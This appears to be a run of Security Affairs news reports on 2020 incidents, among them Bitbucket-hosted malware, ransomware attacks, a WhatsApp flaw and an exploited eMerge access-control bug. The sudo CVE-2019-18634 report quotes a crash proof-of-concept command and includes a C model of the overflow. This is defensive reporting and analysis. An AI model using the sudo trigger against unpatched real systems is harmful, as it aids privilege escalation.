“Dropbox and HackerOne invited 45 hackers from 11 countries including Singapore, the United States, Sweden, Canada, India, the Netherlands, Japan, Australia, Belgium, Hong Kong, The United Kingdom, and Portugal. They gathered to hack new scope and Dropbox core assets at Huone Event Center in the Clarke Quay area of Singapore.” reads the website of the event. “In the days leading up to the event and over the course of 8 hacking hours at h1-65, 39 hackers reported 264 vulnerabilities across all applications and vendors in scope. In return, Dropbox paid $336,479 in bounties to hackers for their contributions to better security.”

The company highlights the importance of a bug bounty program for the security of its users and organizations that use the popular service.

“To those outside of the security community, it may seem counterintuitive that you can make your platform safer by encouraging security researchers to attack you, but that’s exactly the value that these programs deliver,” concluded Dropbox. “This process of discovering and remediating bugs is key to our maintaining a highly secure organization and increasingly hardened product surfaces.”

Pierluigi Paganini

(SecurityAffairs – bug bounty, hacking)

Hackers abuse BitBucket to infect 500K+ hosts with arsenal of malware

Threat actors are abusing the Bitbucket code hosting service to host seven types of malware that have already claimed more than 500,000 business computers.

Cybereason researchers reported that attackers are abusing the Bitbucket code hosting service to store seven types of malware that were employed in an ongoing campaign. According to the experts, the malware already claimed more than 500,000 business computers worldwide.

The attackers’ arsenal includes data stealers, cryptocurrency miners, and ransomware, which literally hit victims from all sides.

“Cybereason is following an active campaign to deliver an arsenal of malware that is able to steal data, mine for cryptocurrency, and deliver ransomware to victims all over the world. Due to the variety of malware types deployed in this attack, attackers are able to hit victims from all sides and do not have to limit themselves to one attack goal or another.” reads the analysis published by Cybereason. “The payloads observed in this campaign originated from different accounts in code repository platform Bitbucket, which was abused as part of the attackers’ delivery infrastructure.”

Attackers abuse legitimate online storage platforms to bypass security products, which tend to trust legitimate online services. The use of online storage platforms also allows attackers to reduce the exposure of their C2 server infrastructure by separating the delivery infrastructure (the online storage platforms) from the C2 infrastructure.

The attackers host the malware on several Bitbucket accounts, and the malicious code receives frequent updates. Cybereason discovered the following payloads actively deployed in this campaign:

  • Predator: Predator is an information stealer that steals credentials from browsers, uses the camera to take pictures, takes screenshots, and steals cryptocurrency wallets.
  • Azorult: Azorult is an information stealer that steals passwords, email credentials, cookies, browser history, IDs, cryptocurrencies, and has backdoor capabilities.
  • Evasive Monero Miner: The Evasive Monero Miner is the dropper for a multi-stage XMRig Miner that uses advanced evasion techniques to mine Monero and stay under the radar.
  • STOP Ransomware: The STOP Ransomware is used to ransom the file system and is based on an open source ransomware platform. It also has downloader capabilities that it uses to infect the system with additional malware.
  • Vidar: Vidar is an information stealer that steals web browser cookies and history, digital wallets, two-factor authentication data, and takes screenshots.
  • Amadey bot: Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information on a target machine.
  • IntelRapid: IntelRapid is a cryptocurrency stealer that steals different types of cryptocurrency wallets.

Attackers use Themida as a packer to evade detection, and the CypherIT AutoIt packer to pack Azorult in an attempt to protect it from analysis.

The usage of multiple payloads on a single system allows attackers to maximize their efforts, especially when the infected systems belong to a corporate network.

The attackers camouflage the malware as bogus cracked versions of commercial software, including “Adobe Photoshop, Microsoft Office, and others.”

Most of the tainted cracks observed in this campaign include the Azorult and Predator the Thief data stealers.

Experts discovered several Bitbucket repositories linked to each other and hosting the same pieces of malware under the same names; in some cases the operators behind this campaign pushed updates as often as every three hours.

“Through research of other samples related to the campaign, we have identified additional Bitbucket repositories that are likely created by the same threat actor with the same set of malware samples.” continues the report. “Judging by the number of downloads, we estimate over 500,000 machines have been infected by the campaign so far, with hundreds of machines affected every hour. ”

More than 500,000 machines have already been compromised, and experts observed hundreds of new infections every hour.

Experts noticed that when there is nothing left to steal from an infected system, the attackers deploy the STOP ransomware to extort the victims and maintain persistence.

“Attackers continue to evolve and look for more effective ways to make a profit. They are finding that, when their tools fail, they can use legitimate ones instead. Security practitioners must find ways to evolve faster and ensure the security of these trusted resources so we can stay ahead of these threats.” concludes the report that also includes Indicators of Compromise (IoCs).

Pierluigi Paganini

(SecurityAffairs – bitbucket, hacking)

Google mistakenly shared private videos of some users with others in 2019

Google has accidentally shared private videos of some users that were stored on its servers with others; the tech giant notified impacted users.

Google admitted a new privacy incident: it accidentally shared private videos saved on its servers with other users. The number of impacted users is not yet clear; the company sent them a security notification and only confirmed that “one or more videos in your Google Photos account was affected by this issue.”

The incident was caused by a technical issue in Google Takeout, a service that allows users of Google products, such as YouTube and Gmail, to export their data to a downloadable archive file.

The issue was confirmed by researcher Jon Oberheide of Duo Security, who published a tweet confirming that some videos saved in Google Photos were exported to unrelated users’ archives.

The technical issue remained active between 21st November and 25th November 2019.

The privacy incident potentially affected users who used the Google Takeout service in the period mentioned above. The tech giant pointed out that the problem did not involve photographs uploaded by users to Google Photos.

The company apologized for any inconvenience the incident may have caused, users can contact its Support service for further assistance.

Pierluigi Paganini

(SecurityAffairs – privacy, data leak)

Facebook fixed a WhatsApp bug that allowed hackers to access local file system

Facebook addressed a critical issue in WhatsApp that would have allowed attackers to read files from a user’s local file system, on macOS and Windows.

Facebook has addressed a critical vulnerability in WhatsApp, tracked as CVE-2019-18426, that would have allowed hackers to read files from a user’s local file system, on macOS and Windows systems.

“A vulnerability in WhatsApp Desktop when paired with WhatsApp for iPhone allows cross-site scripting and local file reading. Exploiting the vulnerability requires the victim to click a link preview from a specially crafted text message.” reads the security advisory published by Facebook.

The issue could be exploited by a remote attacker by tricking the victims into clicking a link preview from a specially crafted text message.

The CVE-2019-18426 flaw affects WhatsApp Desktop prior to v0.3.9309 paired with WhatsApp for iPhone versions prior to 2.20.1 (01-21-2020).

The vulnerability received a CVSS 3.x base score of 8.2 (high severity); it was discovered by Gal Weizman from PerimeterX.

Weizman discovered a gap in WhatsApp’s Content Security Policy (CSP) that allowed cross-site scripting (XSS) in the desktop app; further analysis allowed the expert to gain read permissions on the local file system in both the Windows and macOS WhatsApp desktop apps.

“If you run an old version of a vulnerable app, one can exploit that vulnerability and do bad things to you,” wrote the expert.

“I did however demonstrate how I use fetch() API, for example, to read files from the local OS like the content of C:\Windows\System32\drivers\etc\hosts file in this case.”

The flaw could have allowed attackers to inject malicious code and links into messages in a way that would be completely invisible to the victims.

Pierluigi Paganini

(SecurityAffairs – United Nations, hacking)

Using 99 mobile phones to create a fake traffic jam in Google Maps

A German artist demonstrated how using a simple trick it is possible to deceive Google Maps and create a virtual traffic jam.

The German artist Simon Weckert conducted a simple experiment to demonstrate how to deceive Google Maps and create a virtual traffic jam.

The man put 99 mobile phones running Google Maps in a handcart and walked around the streets of Berlin.

The popular Maps service uses GPS and location data sent by users’ mobile devices to determine routes and avoid traffic congestion at particular points along the path. Using that data, Google Maps detects traffic jams and suggests alternative routes to the destination.

In Weckert’s test, the man walked with 99 active phones, simulating traffic on his route; the service interpreted them as 99 cars moving slowly because of a traffic jam.

This simple test demonstrates that it is quite easy to interfere with the map service. Such an attack could have serious effects on traffic and could be used by attackers to reroute vehicles through specifically chosen routes.

“99 second hand smartphones are transported in a handcart to generate virtual traffic jam in Google Maps. Through this activity, it is possible to turn a green street red which has an impact in the physical world by navigating cars on another route to avoid being stuck in traffic,” Weckert wrote on his web site.

Pierluigi Paganini

(SecurityAffairs – Google, hacking)

The city of Racine was offline following a ransomware attack

The city of Racine joins the long list of US municipalities hit by ransomware attacks; it was forced offline following the infection.

The city of Racine, Wisconsin, was hit by ransomware; the incident took place on January 31, 2020. Most of the city’s non-emergency computer services went offline following the attack.

“City of Racine computer systems were infected by ransomware early Friday morning, and remained that way late Sunday afternoon.” reported the GovernmentTechnology website.

“The city website, its email system and online payment collection were all affected and were still down over the weekend. Racine Police were unable to process fee payments or provide copies of police or accident reports, according to a Racine Police Facebook post.”

The city’s website, email and online payment collection systems were still offline at the time of writing. The police were unable to process fee payments or provide copies of police and accident reports.

On Friday, the city’s Management Information Systems department worked to determine the extent of the infection and implemented its incident response procedures.

Local authorities and feds have launched an investigation into the incident.

The tax collection, 911 and public safety systems were not impacted by the ransomware attack.

“MIS worked over the weekend with the city’s cybersecurity insurer ‘to develop a detailed plan to restore and recover systems without spreading the ransomware,’ according to a statement from Powell.”

“We are also conducting an investigation into the cause and scope of the investigation, including whether any data housed by the City or acquired by the ransomware actor,” Powell said in a statement Saturday evening.

In December, Maze ransomware operators released 2GB of files allegedly stolen from the City of Pensacola during a recent attack.

In November 2019, the state government of Louisiana was hit by a ransomware attack that affected multiple state services, including the Office of Motor Vehicles, the Department of Health, and the Department of Transportation and Development.

The incident forced the state government of Louisiana to shut down numerous state websites as well as email and Internet services.

In recent months other municipalities were hit by ransomware; in August alone at least 23 local government organizations were impacted by ransomware attacks.

Some cities in Florida were victims of hackers, including Key Biscayne, Riviera Beach and Lake City.

In June, the city of Riviera Beach agreed to pay $600,000 in ransom to decrypt its data after a ransomware attack hit its computer systems. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Pierluigi Paganini

(SecurityAffairs – City of Racine, hacking)

The post The city of Racine was offline following a ransomware attack appeared first on Security Affairs.

Toll Group shuts down some online systems after ransomware attack

The Australian transportation and logistics giant Toll Group has suffered a ransomware attack that forced it to shut down part of its services.

The Australian transportation and logistics giant Toll Group was the victim of a ransomware attack; in response to the incident the company shut down some of its online services.

The Toll Group is an Australian transportation and logistics company with operations in road, rail, sea, air, and warehousing, it is a subsidiary of Japan Post Holdings and has over 44,000 employees.

The attack was discovered on January 31, when internal staff detected ransomware on the company’s systems. To mitigate the threat, the personnel isolated some systems to prevent the malware from propagating further.

The company published a security breach notice on its website the same day, but it provided further details some days later.

“As a result of our decision to disable certain systems following a recent cyber security threat, we’re continuing to meet the needs of many of our customers through a combination of manual and automated processes across our global operations, although some are experiencing delay or disruption. For our parcels customers, all of our processing centres are continuing to operate including pick up, processing and dispatch albeit at reduced speed in some cases.” reads a data breach notification published by the company on its website.

“We can confirm the cyber security incident is due to a targeted ransomware attack which led to our decision to immediately isolate and disable some systems in order to limit the spread of the attack.”

The company declared that it has seen no evidence to suggest any personal data was exfiltrated. Toll Group reported the incident to the authorities; an investigation is still ongoing.

While the systems were offline, customers were unable to track their shipments.

The company confirmed that the attack was targeted, but at the time of writing it was unclear which ransomware family infected the systems at Toll Group.

Toll Group is currently working on restoring affected systems, it is only accepting orders via phone.

“We’re working with relevant authorities and have referred the matter to the appropriate bodies for criminal investigation. In the meantime, we’ll continue to work to our current processes in order to meet the needs of our customers.” continues the company.

“Most other Toll operations are continuing to operate on manual systems based on our business continuity plans.” the company added.

Pierluigi Paganini

(SecurityAffairs – Toll Group, hacking)

The post Toll Group shuts down some online systems after ransomware attack appeared first on Security Affairs.

Hackers abused Twitter API to match usernames to phone numbers

Twitter discloses a security incident involving third-parties that exploited its official API to match phone numbers with Twitter usernames.

On December 24, 2019 the company discovered that its API was being exploited by a large network of fake accounts to match Twitter usernames to phone numbers. The company immediately suspended the accounts involved.

“On December 24, 2019 we became aware that someone was using a large network of fake accounts to exploit our API and match usernames to phone numbers. We immediately suspended these accounts” reads the statement published by Twitter.

“During our investigation, we discovered additional accounts that we believe may have been exploiting this same API endpoint beyond its intended use case.”

Twitter learned of the abuse of its API following a report published by TechCrunch, which detailed how security researcher Ibrahim Balic abused a Twitter API endpoint to match 17 million phone numbers to public usernames.

Balic provided TechCrunch with a sample of the phone numbers he successfully matched; in one case, TechCrunch was able to identify a senior Israeli politician from the matched phone number.

Twitter investigated the issue and discovered that the accounts involved in the incident were located in a wide range of countries; a high volume of requests came from IP addresses located in Iran, Israel, and Malaysia.

Twitter speculates that some of these IP addresses may have links to nation-state actors.

Twitter confirmed that the security incident only impacted Twitter users who enabled an option in their settings section to allow phone number-based matching.

“When used as intended, this endpoint makes it easier for new account holders to find people they may already know on Twitter. The endpoint matches phone numbers to Twitter accounts for those people who have enabled the “Let people who have your phone number find you on Twitter” option and who have a phone number associated with their Twitter account.” continues Twitter.

“People who did not have this setting enabled or do not have a phone number associated with their account were not exposed by this vulnerability,”

Twitter immediately implemented a number of changes to this endpoint to avoid future abuse of the API.

Pierluigi Paganini

(SecurityAffairs – Twitter API, hacking)

The post Hackers abused Twitter API to match usernames to phone numbers appeared first on Security Affairs.

NCA arrested six men in UK over Malta Bank Cyber-Heist

Last week the NCA arrested six individuals in the United Kingdom on suspicion of involvement in a cyber-heist against a Maltese bank and a related money laundering operation.

Britain’s National Crime Agency (NCA) arrested six individuals in the United Kingdom accused of involvement in the cyber-heist of a Maltese bank and in laundering the proceeds.

The individuals are suspected of involvement in the attack against the Bank of Valletta that took place in February 2019.

Bank of Valletta is the largest bank in Malta and accounts for almost half of the banking transactions in the country; it had to shut down its operations in February 2019 after hackers attempted to withdraw 13 million euros ($14.7 million).

The news was confirmed by Prime Minister Joseph Muscat: hackers broke into the bank’s systems and transferred the funds overseas. Muscat told parliament that the threat actors attempted to transfer funds to banks in the Czech Republic, Hong Kong, Britain, and the US.

The attackers used a network of accounts to receive those funds, one of which was in Belfast. According to the NCA, crooks transferred roughly £800,000 (~$1.04 million) into the Belfast account.

“Around £800,000 was illegally transferred into an account in Belfast, which then saw payments of more than £340,000 go out before the account could be blocked.” reads the press release published by the NCA.

“The money was spent at high end stores such as Harrods and Selfridges, to buy Rolex watches at a store in London, and on payments for a Jaguar and Audi A5 from a car dealership.”

The suspects were able to make card payments and cash withdrawals totalling £340,000 (~$442,700) from the account before the authorities discovered the fraudulent activity and blocked it.

The individuals used part of the money to make purchases at high-end stores such as Harrods and Selfridges in London, they bought Rolex watches for around £110,000 (~$143,000) at a store in London, and also made payments for a Jaguar and Audi A5 from a car dealership.

The NCA arrested two males (aged 22 and 17) on January 22, 2020, in the West Hampstead and Ladbroke Grove areas of London, the authorities also interviewed a third person.

On January 30, the NCA officers, along with officers from the PSNI, executed two warrants in the north and west Belfast areas and arrested a man (39) on suspicion of money laundering offences, fraud, and theft.

On January 31, two other males, aged 23 and 24, were arrested on suspicion of money laundering offences, fraud, and theft after they handed themselves in at a police station in Belfast. Police arrested another man, aged 33, at Heathrow Airport as he returned to the UK from China.

“Our 12-month investigation, carried out with the help of the Malta Police Force Economic Crime Unit, has focused on a number of individuals we suspect may have been involved in laundering money on behalf of the organized crime group who carried out the cyber-attack,” NCA Belfast branch commander David Cunningham said.

“This has led us to the arrests in London last week and Belfast today, and our investigation continues.”

“This operation demonstrates the reach of the NCA, both domestically and internationally.”

“Working with our law enforcement partners at home and overseas we are determined to do all we can to target and disrupt those involved in organised crime, here in Northern Ireland and across the rest of the UK.”

Pierluigi Paganini

(SecurityAffairs – Malta cyber-heist, hacking)

The post NCA arrested six men in UK over Malta Bank Cyber-Heist appeared first on Security Affairs.

Sudo CVE-2019-18634 flaw allows Non-Privileged Linux and macOS Users run commands as Root

An Apple researcher discovered an important vulnerability (CVE-2019-18634) in the ‘sudo’ utility that allows non-privileged Linux and macOS users to run commands as root.

Security expert Joe Vennix of Apple has discovered an important vulnerability in the ‘sudo’ utility, tracked as CVE-2019-18634, that allows non-privileged Linux and macOS users to run commands as root.

The issue can be exploited only under a specific configuration.

Sudo is one of the most important, powerful, and commonly used utilities that comes as a core command pre-installed on macOS and almost every UNIX or Linux-based operating system.

sudo is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, by default the superuser. It originally stood for “superuser do” as the older versions of sudo were designed to run commands only as the superuser.

The root cause of the privilege escalation is a stack-based buffer overflow that resides in sudo versions before 1.8.26.

The vulnerability can be exploited only when the “pwfeedback” option is enabled in the sudoers configuration file. The pwfeedback option makes sudo print a line of asterisks as visual feedback while the user types their password.

“In Sudo before 1.8.26, if pwfeedback is enabled in /etc/sudoers, users can trigger a stack-based buffer overflow in the privileged sudo process. (pwfeedback is a default setting in Linux Mint and elementary OS; however, it is NOT the default for upstream and many other packages, and would exist only if enabled by an administrator.)” reads the description published by the NIST. “The attacker needs to deliver a long string to the stdin of getln() in tgetpass.c.”

The expert pointed out that this vulnerability can be triggered even by users not listed in the sudoers file.

“Exploiting the bug does not require sudo permissions, merely that pwfeedback be enabled.” wrote Sudo developer Todd C. Miller.

“The bug can be reproduced by passing a large input to sudo via a pipe when it prompts for a password. For example:

    $ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
    Password: Segmentation fault

There are two flaws that contribute to this vulnerability:

  • The pwfeedback option is not ignored, as it should be, when reading from something other than a terminal device. Due to the lack of a terminal, the saved version of the line erase character remains at its initialized value of 0.
  • The code that erases the line of asterisks does not properly reset the buffer position if there is a write error, but it does reset the remaining buffer length. As a result, the getln() function can write past the end of the buffer.”
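To make the two defects concrete, the following C program is an added model written for this article; it is not sudo’s tgetpass.c and not code from Miller’s advisory. It assumes a 16-byte line buffer, simulates the backspace write(2) with a `write_fails` flag, and applies both corrections when `fixed` is set (ignore pwfeedback when stdin is not a terminal; reset the position as well as the remaining length when the erase write fails). Feeding it a PoC-style input (a run of bytes, a NUL, another run) with no terminal shows the write position being left in place while the remaining length is reset, so the second run lands past the end of the buffer; with the fixes applied, the NUL is stored as an ordinary byte and the copy stops at the buffer limit.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define LINE_SIZE 16   /* modelled password buffer (assumption; sudo's is larger) */
#define SLACK     64   /* extra storage so an overflow stays observable without undefined behaviour */

struct line {
    char storage[LINE_SIZE + SLACK];
};

/* Stand-in for the write(2) of backspaces that erases the echoed asterisks. */
static bool erase_write(bool write_fails)
{
    return !write_fails;
}

/*
 * Model of getln(): copies `inlen` bytes of `input` into the line buffer,
 * honouring the line-erase character when password feedback is active.
 * Returns the number of bytes stored; anything above LINE_SIZE - 1 means
 * the model wrote past the end of the buffer.
 */
size_t model_getln(const char *input, size_t inlen, bool is_tty, bool pwfeedback,
                   bool write_fails, bool fixed, struct line *ln)
{
    memset(ln->storage, 0, sizeof ln->storage);
    char *buf = ln->storage;
    char *cp = buf;                /* current write position */
    size_t left = LINE_SIZE - 1;   /* bytes remaining before the terminating NUL */

    /* Flaw 1: with no terminal the saved erase character keeps its initial
     * value of 0, so a NUL byte triggers the erase path.  The fix ignores
     * pwfeedback entirely when stdin is not a terminal. */
    char kill_char = is_tty ? 0x15 /* ^U */ : 0;
    bool feedback  = pwfeedback && (is_tty || !fixed);

    for (size_t i = 0; i < inlen; i++) {
        char c = input[i];
        if (feedback && c == kill_char) {
            bool ok = erase_write(write_fails);
            /* Flaw 2: the vulnerable logic resets the position only when the
             * erase write succeeds, but resets the remaining length regardless,
             * so after a failed write the next bytes continue from the old
             * position with a full budget.  The fix resets both. */
            if (ok || fixed)
                cp = buf;
            left = LINE_SIZE - 1;
            continue;
        }
        if (left == 0)
            break;
        *cp++ = c;
        left--;
    }
    *cp = '\0';
    return (size_t)(cp - buf);
}

/* Feed a PoC-style input through the model with stdin not a terminal and
 * pwfeedback enabled; returns the number of bytes stored.  The input is
 * constructed for this example and mirrors the shape of the perl one-liner. */
size_t run_poc(bool fixed)
{
    static const char payload[] = "AAAAAAAAAA\0AAAAAAAAAA"; /* 10 x 'A', NUL, 10 x 'A' */
    struct line ln;
    return model_getln(payload, sizeof payload - 1, /*is_tty*/ false,
                       /*pwfeedback*/ true, /*write_fails*/ true, fixed, &ln);
}

int main(void)
{
    printf("vulnerable: %zu bytes stored in a %d-byte buffer\n", run_poc(false), LINE_SIZE);
    printf("fixed:      %zu bytes stored in a %d-byte buffer\n", run_poc(true), LINE_SIZE);
    return 0;
}
```

The model keeps the overflow inside a slack region so it can be observed safely; in the real process the excess bytes land on the stack of the privileged sudo process, which is what makes the bug a privilege escalation rather than a crash.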

Users can determine whether they are affected by running the “sudo -l” command in a Linux or macOS terminal: if “pwfeedback” appears among the “Matching Defaults entries” in the output, the option is enabled. The installed version can be checked with “sudo --version” and compared with the fixed release.

In case the option is enabled, it is possible to disable it by changing “Defaults pwfeedback” to “Defaults !pwfeedback” in the sudoers configuration file.

The sudo maintainers addressed the flaw with the release of sudo version 1.8.31.

“While the logic bug is also present in sudo versions 1.8.26 through 1.8.30 it is not exploitable due to a change in EOF handling introduced in sudo 1.8.26,” Miller explained.

In October 2019, Vennix discovered a security policy bypass issue in the sudo utility that could be exploited by an ill-intentioned user or a malicious program to execute arbitrary commands as root on a targeted Linux system, even if the sudoers configuration disallows root access.

Pierluigi Paganini

(SecurityAffairs – CVE-2019-18634, hacking)

The post Sudo CVE-2019-18634 flaw allows Non-Privileged Linux and macOS Users run commands as Root appeared first on Security Affairs.

Police are warning crooks are using cleaners to compromise businesses

Cybercriminals are planting so-called “sleepers” in cleaning companies so that they can physically access IT infrastructure and hack them.

The warning was issued by a senior police officer: cyber criminals are planting so-called “sleepers” in cleaning companies so that they can gain physical access to IT infrastructure and hack it. The police are urging organizations to bolster their physical security processes. Cleaners allow attackers to bypass physical security measures, and once inside the target organization they can hack internal systems and move laterally.

“Exploitation of staff is a key area. Organised crime groups are planting ‘sleepers’ in cleaning companies that a procurement team may look at bidding for. There’s no way of auditing their vetting. They’re also using people in painting and decorating firms; anyone who has out-of-hours access to a building is fair game.” Shelton Newsham, who manages the Yorkshire and Humber Regional Cyber Crime Team, told an audience at the SINET security event. “Even the old ‘drop a USB stick’ is back.”

“There are small steps businesses can make: we’re changing our visitor passes: until three weeks ago they were red, like our brand. Now they’re black and we encourage staff to be more suspicious of who’s walking around.” Emma Leith, Santander’s UK CISO/Director of Security & Privacy Services, told Computer Business Review. “Regular red teaming and purple teaming; capture the flag exercises [all help], biometrics too, although there’s no point having cutting edge systems running on an old Windows server.”

The only way to prevent this kind of physical intrusion, which exploits the human factor and social engineering, is a cultural change.

Emma Leith stressed the importance of security awareness and of regular training for internal personnel.

Pierluigi Paganini

(SecurityAffairs – physical access, cleaners)

The post Police are warning crooks are using cleaners to compromise businesses appeared first on Security Affairs.

Ransomware brought down services of popular TV search engine TVEyes

TVEyes was brought down after its core server and engineering workstations were infected by ransomware, the company’s CEO confirmed.

TVEyes is a company that manages a popular platform for monitoring TV and radio news broadcasts, it is used worldwide by PR agencies and newsrooms.

On Thursday night, a ransomware attack hit the company network, causing an outage of its media monitoring and data feed services (i.e. the TVEyes Media Monitoring Suite (MMS)).

TVEyes notified its customers by email; a tweet sent by the company to Medium Buying explained that the root cause of the outage was a ransomware infection.

“We are rebuilding the core system on fresh hardware, and expect to have TVEyes back online soon, but do not have an exact ETA for services to be restored,” the email says. “As you can imagine, TVEyes engineers are working nonstop and will continue to do so until we are back up and running.”

CEO David Ives confirmed that the company did not pay the ransom and that internal staff restored from backups after sanitizing the impacted systems.

“All the engineers have been working on this since early yesterday morning, and there’s no evidence that was downloaded,” said TVEyes CEO David Ives.

Ives said in an interview: “It appears it was purely an attack to make money.”

At the time of writing, the company has not yet identified the ransomware family that infected its systems.

It is also unclear whether the attackers exfiltrated information from the company.

The company CEO added that the attack didn’t appear to be the result of a cyber espionage campaign aimed at stealing data on political candidates.

Pierluigi Paganini

(SecurityAffairs – TVEyes, hacking)

The post Ransomware brought down services of popular TV search engine TVEyes appeared first on Security Affairs.

Attackers are hacking NSC Linear eMerge E3 building access systems to launch DDoS attacks

Hackers have already compromised more than 2,300 Linear eMerge E3 building access systems exploiting a severe vulnerability that has yet to be fixed.

Linear eMerge E3 smart building access systems designed by Nortek Security & Control (NSC) are affected by a severe vulnerability (CVE-2019-7256) that has yet to be fixed and attackers are actively scanning the internet for vulnerable devices.

Researchers from SonicWall revealed that hackers are attempting to compromise Linear eMerge E3 smart building access systems to recruit them in a DDoS botnet.

The Linear E3 devices are installed in commercial, industrial, banking, medical, retail, hospitality, and other businesses to secure their facilities and manage personnel access.

In May 2019, security researcher Gjoko Krstic from Applied Risk discovered over 100 vulnerabilities in management and access control systems from four major vendors, including Nortek.

An attacker can exploit the vulnerabilities to gain full control of the vulnerable products and access to the devices connected to them.

Krstic conducted a year-long study of building management (BMS), building automation (BAS) and access control products from Nortek, Prima Systems, Optergy, and Computrols. He analyzed several products, including Computrols CBAS-Web, Optergy Proton/Enterprise, Prima FlexAir, and two Nortek Linear eMerge products.

Krstic found several types of flaws, including default and hardcoded credentials, command injection, cross-site scripting (XSS), path traversal, unrestricted file upload, privilege escalation, authorization bypass, clear-text storage of passwords, cross-site request forgery (CSRF), arbitrary code execution, authentication bypass, information disclosure, open redirect, user enumeration, and backdoors.

“Attackers can easily obtain default passwords and identify internet-connected target systems. Passwords can be found in product documentation and compiled lists available on the Internet.” reads the advisory published by Applied Risk. “It is possible to identify exposed systems using search engines like Shodan, and it is feasible to scan the entire IPv4 internet. Applied Risk has calculated a CVSSv3 score of 9.8 for this vulnerability”

In November, Applied Risk released a proof-of-concept exploit code for the CVE-2019-7256 flaw along with a Metasploit module that exploits a command injection vulnerability in the Linear eMerge E3 Access Controller.

According to a report recently published by SonicWall, hackers are scanning the Internet for NSC Linear eMerge E3 devices to exploit the CVE-2019-7256 flaw. The experts warn that the vulnerability is very easy to exploit, attackers are triggering it via a specially crafted HTTP request that is sent to vulnerable systems.

“SonicWall Capture Labs Threat Research team observe huge hits on our firewalls that attempt to exploit the command injection vulnerability with the below HTTP request.” reads the advisory published by SonicWall.

“Once the vulnerability is exploited successfully on the target, the following shell commands will be executed on the target system:

The above shell commands are used to download the malware and execute it on the exploited systems.”

Threat actors are compromising the access control systems via the CVE-2019-7256 flaw and installing a DDoS bot; the malicious activity was first reported on January 9 by Bad Packets.

“As per Applied Risk’s research report, a total number of 2,375 Internet-accessible eMerge devices are listed by the Shodan search engine; 600 for eMerge50P and 1775 for eMerge E3.” continues SonicWall.

“Attackers seem to be actively targeting these devices as we see tens of thousands of hits every day, targeting over 100 countries with the most [attacks being] observed in U.S.”

The hackers are actively targeting devices exposed online that are located in over 100 countries, most of them in the U.S.

Experts recommend disconnecting vulnerable NSC Linear eMerge E3 devices from the Internet or limiting access to them.

Pierluigi Paganini

(SecurityAffairs – NSC Linear eMerge E3, hacking)

The post Attackers are hacking NSC Linear eMerge E3 building access systems to launch DDoS attacks appeared first on Security Affairs.

Apollon Darknet market is allegedly pulling an exit scam

The Apollon market, one of the largest darknet marketplaces, is likely exit scamming after its administrators locked vendors’ accounts.

The Apollon market, one of the darknet’s largest marketplaces, is likely exit scamming, vendors and customers reported suspicious behavior of its administrators.

Users on Reddit are reporting that vendors can neither withdraw funds nor sign into their accounts; only buyers are still able to sign in.

Apollon (http://apollonujscjrlng.onion) is a classic escrow market founded in March 2018, with more than 54,000 listings as of January 2020.


On January 28, an attacker started launching massive DDoS attacks against Dread (a Reddit-style forum on the dark web), Envoy, The Hub, and other forums. Many black markets were taken down and access to their platforms was limited. The administrator of the Dread forum speculates that Apollon is responsible for “the attacks against all the forums and Empire.”

What is the connection between Apollon and Dread?

Experts noticed that this is the third market to exit scam while Dread was offline for weeks. Darknetstats revealed last year that the Apollon market is owned by a group called Hugbunter, which also owns other black markets, including the Avaris Market, the Whitehouse Market, the Versus Market, and the Cannahome and Monopoly Markets.

According to Darknetstats, every time Dread is offline a market exit scams, and it is not a coincidence: it is one of the markets the same group owns that shuts down.

“Everytime dread is offline, a market exit scams. It isn’t just a random market that goes offline, its their owned market that exit scams, thats because people can’t report the exit scam in its early stage to avoid getting less than expected returns.” continues Darknetstats.

“Since the downtime we’ve had some reports of problems with Apollon.” wrote SamWhiskey, one of the Dread moderators. “Apollon market is paying for DDOS attacks against dread, avengers, the hub, envoy and empire. Most likely to cover up an exit scam.”

Some vendors on Apollon Market reported their problems using the platform to Darknetlive.

“I can confirm that when I try to sign into Apollon I get the following: The username and/or password you entered is invalid.” reported the vendor SteroidWarehouse. “This morning I could still login and then all of a sudden I couldn’t. I also had several customers who told me that their wallets have been depleted yesterday night and this morning. It might be that they’re doing a Nightmare style exit scam. If you need more details please let me know.”

The news of a possible Apollon exit scam was also reported by the Darknetstats website.

“The second largest darknet market is in the midst of an exit scam according to multiple sources that have confirmed the reports to us. Over the past week we received several reports of users deposits not getting added to their accounts and today they locked all vendor accounts which leads to the conclusion that they are now actively scamming users of their funds.” reads a post published on the Darknetstats website.

“The conclusion is clear. We will see a powerful shilling in favor of Avaris Market and everyone will be asked to join Avaris (and whitehouse too) on Dread. The accounts that will do the shilling can be easily identified by experts but new users will definitely fall for this trap and will join this market and get scammed again. Our advice will be to stay away at all costs from the markets mentioned above.”

Pierluigi Paganini

(SecurityAffairs – Apollon Market, exit scam)

The post Apollon Darknet market is allegedly pulling an exit scam appeared first on Security Affairs.

Russia’s watchdog Roskomnadzor threatens to fine Twitter and Facebook

Russia’s Roskomnadzor watchdog wants to fine Facebook and Twitter after they refused to store data of Russian users on servers located in the country.

Russia’s telecommunications watchdog Roskomnadzor has instituted administrative proceedings against Facebook and Twitter after they refused to store data of Russian users on servers located in the country.

“On January 31, 2020, Roskomnadzor instituted administrative proceedings against Facebook, Inc. and Twitter, Inc. These companies did not provide information on meeting the requirements for localizing the databases of Russian users of the corresponding social networks on servers located in the Russian Federation, as provided for in part 5 of Article 18 of the Law on Personal Data No. 152-FZ.” states the press release published by the Russian watchdog. “Administrative proceedings were instituted on the grounds of an administrative offense in accordance with part 8 of article 13.11. Administrative Code of the Russian Federation, which provides for an administrative fine in the amount of 1 million to 6 million rubles.”

Roskomnadzor revealed that the proceedings protocol was signed in the presence of a representative of Twitter, while no Facebook representative was present to sign it; Facebook will receive a copy of the protocol within three days.

Both companies could be ordered to pay a fine ranging between 1 million rubles (approximately $16,000) and 6 million rubles ($94,000).

“You can bypass bans, but if the company works [in Russia], it’ll have to pay,” Deputy Communications Minister Alexei Volin told the state-run TASS news agency Thursday.

The Russian government already blocked the professional social network LinkedIn in 2016 under the same data-localization legislation.

